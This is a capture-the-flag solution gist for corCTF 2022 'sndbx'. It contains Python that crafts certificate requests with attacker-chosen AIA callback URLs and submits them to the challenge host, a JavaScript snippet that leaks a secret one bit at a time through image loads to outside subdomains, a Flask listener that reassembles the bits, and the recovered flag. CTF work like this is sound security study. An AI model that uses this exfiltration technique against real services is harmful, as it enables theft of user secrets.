@maple3142
Created August 8, 2022 00:52
corCTF 2022 sndbx
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import (
NameOID,
ExtendedKeyUsageOID,
AuthorityInformationAccessOID,
)
def gen(ocsp_url, ca_url):
    """Create a fresh RSA key and a PEM-encoded CSR for ``*.daplie.me``.

    The request carries three non-critical extensions, added in this order:
    a subjectAltName with the same wildcard DNS name, an extendedKeyUsage of
    OCSP signing, and an authorityInfoAccess that lists *ocsp_url* as the
    OCSP responder and *ca_url* as the CA-issuers location.

    Args:
        ocsp_url: URI placed in the AIA OCSP access description.
        ca_url: URI placed in the AIA CA-issuers access description.

    Returns:
        A ``(csr, priv)`` tuple of PEM ``bytes``: the signed request and the
        private key serialized as unencrypted PKCS#8.
    """
    wildcard = "*.daplie.me"
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, wildcard)])
    san = x509.SubjectAlternativeName([x509.DNSName(wildcard)])
    eku = x509.ExtendedKeyUsage([ExtendedKeyUsageOID.OCSP_SIGNING])
    # Both URIs are embedded exactly as passed in, with no validation.
    # NOTE(review): a service that dereferences AIA URIs taken from submitted
    # certificate material makes outbound requests to requester-chosen hosts;
    # presumably that is the behaviour relied on here -- the server side is
    # not shown on this page.
    aia = x509.AuthorityInformationAccess(
        [
            x509.AccessDescription(
                AuthorityInformationAccessOID.OCSP,
                x509.UniformResourceIdentifier(ocsp_url),
            ),
            x509.AccessDescription(
                AuthorityInformationAccessOID.CA_ISSUERS,
                x509.UniformResourceIdentifier(ca_url),
            ),
        ]
    )

    # Extension order matches the original: SAN, EKU, then AIA.
    request = (
        x509.CertificateSigningRequestBuilder()
        .subject_name(subject)
        .add_extension(san, critical=False)
        .add_extension(eku, critical=False)
        .add_extension(aia, critical=False)
        .sign(key, hashes.SHA256())
    )

    csr_pem = request.public_bytes(serialization.Encoding.PEM)
    # The key is written without a passphrase (NoEncryption).
    key_pem = key.private_bytes(
        serialization.Encoding.PEM,
        serialization.PrivateFormat.PKCS8,
        serialization.NoEncryption(),
    )
    return csr_pem, key_pem
import httpx
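# Submit eight CSRs, one per bit position, and collect the value the service
# returns for each inside <span class="code">...</span>.
ar = []
for i in range(8):
    csr, priv = gen("http://YOUR_SERVER/bit/" + str(i), "http://YOUR_SERVER/ca")
    # A fresh client is used for every iteration, as in the original. The
    # context manager closes its connection pool, which was previously leaked
    # on each pass.
    # NOTE: verify=False disables TLS certificate validation for this client,
    # so the peer's identity is not checked; kept as the author wrote it.
    with httpx.Client(base_url='https://daplie.me', verify=False) as client:
        client.post('/create')
        r = client.post('/add', data={
            'csr': csr.decode(),
            'priv': priv.decode(),
        })
    # The response body is already fully read, so it remains usable after the
    # client is closed.
    u = r.text.split('<span class="code">')[1].split('</span>')[0]
    print(i)
    print(u)
    print()
    ar.append(u)
print(ar)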
# Bare string literal: it is evaluated and discarded, so it has no runtime
# effect and serves only as the author's notes. It holds the JavaScript used
# together with the CSRs above, followed by the recovered flag. The snippet
# reads one character code of `flag` and, for every bit i that is set, loads
# an image from https://urls[i]; `urls` presumably holds the values printed
# as `ar` above.
"""
const urls = ['adskeijoftisltjsmafdka.daplie.me', 'loqygyu03-c63wtg5pa9ja.daplie.me', 'xuz4rnbfa2_w7hyztxk0wa.daplie.me', 'pdvlygbkm1_f6w1xwwbiig.daplie.me', 'hqv7fki-8yuq7vrsarfxpg.daplie.me', 'bhd-psznuerilr9guvirdw.daplie.me', 'g36jgxy49ydyk1pm86djdq.daplie.me', 'ztnoo5ddk18mzxdjl5cvsg.daplie.me']
;(async ()=>{
const c = flag.charCodeAt(0) // change this to leak other flag char
for(let i=7;i>=0;i--){
if((c>>i)&1){
(new Image).src = 'https://' + urls[i]
}
}
})()
corctf{i_hate_x509_11fb05ad469e4721}
"""
from flask import Flask
import logging
# Flask application that receives the per-bit callbacks.
app = Flask(__name__)
# INFO level so the app.logger.info() calls in the /bit handler are emitted.
app.logger.setLevel(logging.INFO)
# One slot per bit position (index 0 = least significant); all start at 0.
bits = [0 for _ in range(8)]
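@app.route("/bit/<n>", methods=["POST"])
def bit(n):
    """Mark bit position *n* as set and log the byte assembled so far.

    Args:
        n: Path segment naming the bit position; must parse as an integer
            in the range 0..7.

    Returns:
        An empty body, with status 400 when *n* is not a valid bit position.
    """
    # n is taken from the request path, so it is untrusted. Previously a
    # non-numeric or too-large value raised inside the handler (HTTP 500) and
    # a negative value silently indexed from the end of the list.
    try:
        idx = int(n)
    except ValueError:
        return "", 400
    if not 0 <= idx < len(bits):
        return "", 400

    bits[idx] = 1
    app.logger.info(bits)
    # bits[0] is the least significant bit, hence the reversal before parsing
    # the list as a binary number.
    app.logger.info(chr(int("".join(map(str, bits[::-1])), 2)))
    return ""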
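# Start Flask's built-in server only when this file is executed directly, so
# that importing the module does not open a listener. host="0.0.0.0" binds
# every interface, and port 80 normally requires elevated privileges.
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)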